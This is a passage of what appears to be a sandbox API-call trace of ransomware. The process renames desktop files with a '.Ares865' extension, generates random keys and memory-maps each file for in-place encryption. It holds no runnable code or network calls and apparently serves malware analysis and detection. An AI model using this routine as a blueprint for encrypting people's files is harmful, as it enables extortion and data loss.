67 [0106.994] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Wl8bPblcznhyYXJw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-wl8bpblcznhyyxjw.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Wl8bPblcznhyYXJw.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-wl8bpblcznhyyxjw.bmp.ares865"), dwFlags=0x1) returned 1 [0106.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Wl8bPblcznhyYXJw.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-wl8bpblcznhyyxjw.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.996] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31573) returned 1 [0106.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.997] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.997] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.997] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.997] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e60, lpName=0x0) returned 0x124 [0106.998] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e60) returned 0x190000 [0106.999] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.999] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.999] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0107.001] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1iK6oPNL7IBf7.mp3.Ares865") returned 63 [0107.001] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1iK6oPNL7IBf7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ik6opnl7ibf7.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1iK6oPNL7IBf7.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ik6opnl7ibf7.mp3.ares865"), dwFlags=0x1) returned 1 [0107.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1iK6oPNL7IBf7.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ik6opnl7ibf7.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.003] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11865) returned 1 [0107.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0107.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0107.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0107.003] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.004] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.004] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.004] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3160, lpName=0x0) returned 0x124 [0107.004] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3160) returned 0x190000 [0107.005] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.006] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.006] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.006] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0107.008] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Ke-Zs3-.avi.Ares865") returned 58 [0107.008] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Ke-Zs3-.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ke-zs3-.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Ke-Zs3-.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ke-zs3-.avi.ares865"), dwFlags=0x1) returned 1 [0107.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Ke-Zs3-.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ke-zs3-.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.010] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=58024) returned 1 [0107.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0107.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0107.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0107.010] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.011] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.011] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.011] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe5b0, lpName=0x0) returned 0x124 [0107.011] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe5b0) returned 0x190000 [0107.013] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.014] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.014] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0107.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2G 0.jpg.Ares865") returned 54 [0107.016] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2G 0.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2g 0.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2G 0.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2g 0.jpg.ares865"), dwFlags=0x1) returned 1 [0107.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2G 0.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2g 0.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5525) returned 1 [0107.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0107.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0107.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0107.018] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.018] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.019] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.019] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18a0, lpName=0x0) returned 0x124 [0107.019] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18a0) returned 0x190000 [0107.019] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.020] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.020] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0107.022] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3I5UVmK8q.jpg.Ares865") returned 59 [0107.022] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3I5UVmK8q.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3i5uvmk8q.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3I5UVmK8q.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3i5uvmk8q.jpg.ares865"), dwFlags=0x1) returned 1 [0107.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3I5UVmK8q.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3i5uvmk8q.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.028] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31323) returned 1 [0107.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0107.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0107.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0107.028] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.029] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.029] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.029] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d60, lpName=0x0) returned 0x124 [0107.029] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d60) returned 0x190000 [0107.030] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.031] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.031] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0107.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6E2 vMDzRqNRS7ILqL.bmp.Ares865") returned 68 [0107.033] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6E2 vMDzRqNRS7ILqL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6e2 vmdzrqnrs7ilql.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6E2 vMDzRqNRS7ILqL.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6e2 vmdzrqnrs7ilql.bmp.ares865"), dwFlags=0x1) returned 1 [0107.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6E2 vMDzRqNRS7ILqL.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6e2 vmdzrqnrs7ilql.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.035] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41049) returned 1 [0107.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0107.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0107.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0107.036] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.036] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.036] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.037] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa360, lpName=0x0) returned 0x124 [0107.037] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa360) returned 0x190000 [0107.038] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.039] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.039] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0107.042] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRLFoVWUtc.bmp.Ares865") returned 60 [0107.042] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRLFoVWUtc.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\arlfovwutc.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRLFoVWUtc.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\arlfovwutc.bmp.ares865"), dwFlags=0x1) returned 1 [0107.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRLFoVWUtc.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\arlfovwutc.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.047] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57972) returned 1 [0107.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0107.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0107.047] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.048] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.048] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.048] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe580, lpName=0x0) returned 0x124 [0107.048] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe580) returned 0x190000 [0107.050] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.050] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.050] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.053] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BpWpCzm981jZsivJgFs.bmp.Ares865") returned 69 [0107.053] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BpWpCzm981jZsivJgFs.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bpwpczm981jzsivjgfs.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BpWpCzm981jZsivJgFs.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bpwpczm981jzsivjgfs.bmp.ares865"), dwFlags=0x1) returned 1 [0107.056] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BpWpCzm981jZsivJgFs.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bpwpczm981jzsivjgfs.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.056] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35035) returned 1 [0107.056] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.057] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.057] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.057] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8be0, lpName=0x0) returned 0x124 [0107.057] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8be0) returned 0x190000 [0107.058] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.059] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.059] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.060] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c-sdA7L0 vMS.swf.Ares865") returned 62 [0107.060] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c-sdA7L0 vMS.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c-sda7l0 vms.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c-sdA7L0 vMS.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c-sda7l0 vms.swf.ares865"), dwFlags=0x1) returned 1 [0107.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c-sdA7L0 vMS.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c-sda7l0 vms.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27525) returned 1 [0107.062] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.063] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.063] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.063] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e90, lpName=0x0) returned 0x124 [0107.063] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e90) returned 0x190000 [0107.064] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.065] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.065] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.067] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cfn.mp3.Ares865") returned 53 [0107.067] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cfn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cfn.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cfn.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cfn.mp3.ares865"), dwFlags=0x1) returned 1 [0107.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cfn.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cfn.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.068] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=95248) returned 1 [0107.068] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.069] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.069] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.069] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17710, lpName=0x0) returned 0x124 [0107.069] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17710) returned 0x190000 [0107.071] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.072] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.072] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.075] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CWS0.swf.Ares865") returned 54 [0107.075] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CWS0.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cws0.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CWS0.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cws0.swf.ares865"), dwFlags=0x1) returned 1 [0107.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CWS0.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cws0.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6794) returned 1 [0107.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.077] 